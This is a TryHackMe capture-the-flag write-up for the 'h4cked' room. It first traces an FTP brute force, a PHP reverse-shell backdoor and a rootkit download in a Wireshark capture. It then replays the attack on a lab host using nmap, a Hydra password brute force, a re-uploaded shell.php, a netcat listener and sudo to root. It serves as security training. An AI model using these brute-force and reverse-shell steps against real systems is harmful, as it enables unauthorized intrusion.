THM Writeup – h4cked

THM Writeup – h4cked

THM Writeup - h4cked

Find out what happened by analysing a .pcap file and hack your way back into the machine

Room: h4cked

Difficulty: Easy

Operating System: Linux

Author: toxicat0r

It seems like our machine got hacked by an anonymous threat actor. However, we are lucky to have a .pcap file from the attack. Can you determine what happened? Download the .pcap file and use Wireshark to view it.

Task 1: Oh no! We’ve been hacked!

The attacker is trying to log into a specific service. What service is this?

capture.pcapng - specific service

There is a very popular tool by Van Hauser which can be used to brute force a series of services. What is the name of this tool?

Search for van hauser tool:

van hauser tool search result

The attacker is trying to log on with a specific username. What is the username?

Select first FTP packet (No. 49) > right click > select Follow > TCP Stream:

capture.pcapng - tcp stream

TCP Stream:

wireshark - tcp stream

What is the user’s password?

Look at the TCP Stream from previous question.

What is the current FTP working directory after the attacker logged in?

In the TCP Stream window click 230 Login successful. – it selects appropriate packet in the main window (No. 305):

wireshark - tcp stream, packet selection

Notice packet’s length and use following filter to display only successful logins:

ftp and frame.len==89

Select the second packet (No. 395) > right click > Follow > TCP Stream:

wireshark - tcp stream - login successful

The attacker uploaded a backdoor. What is the backdoor’s filename?

Look at the TCP Stream from previous question.

The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?

In the TCP Stream window click 150 Ok to send data. – it selects appropriate packet in the main window (No. 429):

wireshark - tcp stream - packet selection 2

Now find the closest FTP-DATA packet (No. 431) and look at the data:

wireshark - ftp-data packet

Or look at the question hint that says Look at the FTP-DATA protocol and use filter to filter FTP-DATA:

wireshark - ftp-data packet 2

Which command did the attacker manually execute after getting a reverse shell?

Find the first packet after calling /shell.php where destination port is 80 (No. 452):

wireshark - packet 452

Right click > Follow > TCP Stream:

wireshark - tcp stream 3

What is the computer’s hostname?

Look at the TCP Stream from previous question.

Which command did the attacker execute to spawn a new TTY shell?

Look at the TCP Stream from previous question.

Which command was executed to gain a root shell?

Scroll down a little bit in the TCP Stream from previous question:

wireshark - tcp stream 3

The attacker downloaded something from GitHub. What is the name of the GitHub project?

Look at the TCP Stream from previous question.

The project can be used to install a stealthy backdoor on the system. It can be very hard to detect. What is this type of backdoor called?

Browse to the Github repository from the previous question and look at the About section.

Task 2: Hack your way back into the machine

Add IP address to your hosts file:

echo '10.10.93.72    hacked.thm' >> /etc/hosts

Scan the target machine – find open ports first:

nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv hacked.thm

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64

Get more details about open ports:

nmap -T4 -A -p 21,80 hacked.thm

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

We have 2 ports open: 21 (FTP – File Transfer Protocol), 80 (HTTP – Apache server)

We know the FTP username is jenny, use Hydra to try to find her password changed by the attacker:

hydra -l jenny -P /usr/share/wordlists/rockyou.txt ftp://hacked.thm

[21][ftp] host: hacked.thm   login: jenny   password: [REDACTED]
1 of 1 target successfully completed, 1 valid password found

Log in to FTP service:

root@attackbox:~# ftp hacked.thm
Connected to hacked.thm.
220 Hello FTP World!
Name (hacked.thm:root): jenny
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

List files and directories in the current directory:

ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1000     1000         4096 Feb 01  2021 .
drwxr-xr-x    3 0        0            4096 Feb 01  2021 ..
-rw-r--r--    1 1000     1000        10918 Feb 01  2021 index.html
-rwxrwxrwx    1 1000     1000         5493 Feb 01  2021 shell.php
226 Directory send OK.
ftp>

shell.php is still there and is writeable for our user.

Download it to your attacking machine:

ftp> get shell.php
local: shell.php remote: shell.php
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for shell.php (5493 bytes).
226 Transfer complete.
5493 bytes received in 0.00 secs (3.2926 MB/s)
ftp>

Open another terminal window, open shell.php file and change $ip and $port variables to IP address of your attacking machine and desired port number:

nano shell.php

For me it looks like this:

shell.php configuration section

Save the file, go back to FTP terminal window and upload the file back to the target machine:

ftp> put shell.php
local: shell.php remote: shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5494 bytes sent in 0.00 secs (134.3458 MB/s)
ftp>

Open another terminal window and run netcat listener:

nc -lnvp 4242

Now open a browser and browse to http://hacked.thm/shell.php – and we received a reverse shell:

root@ip-10-10-14-175:~# nc -lnvp 4242
Listening on [0.0.0.0] (family 0, port 4242)
Connection from 10.10.93.72 49848 received!
Linux wir3 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 08:46:17 up 22 min,  0 users,  load average: 0.00, 0.03, 0.13
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Now let’s replicate attacker’s steps (we saw all the steps in the tcp.stream eq 20 = find packet No. 452 > right click > Follow > TCP Stream).

First we need to spawn a new TTY shell:

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@wir3:/$

Switch to user jenny:

www-data@wir3:/$ su jenny
su jenny
Password: [REDACTED]

jenny@wir3:/$

Since user jenny can execute all command with sudo, we can switch to root user:

jenny@wir3:/$ sudo su
sudo su
[sudo] password for jenny: [REDACTED]

root@wir3:/#

Read the flag.txt file:

root@wir3:/# cat /root/Reptile/flag.txt
cat /root/Reptile/flag.txt
[REDACTED]

Do you like this writeup? Check out other THM Writeups.

Comments are closed.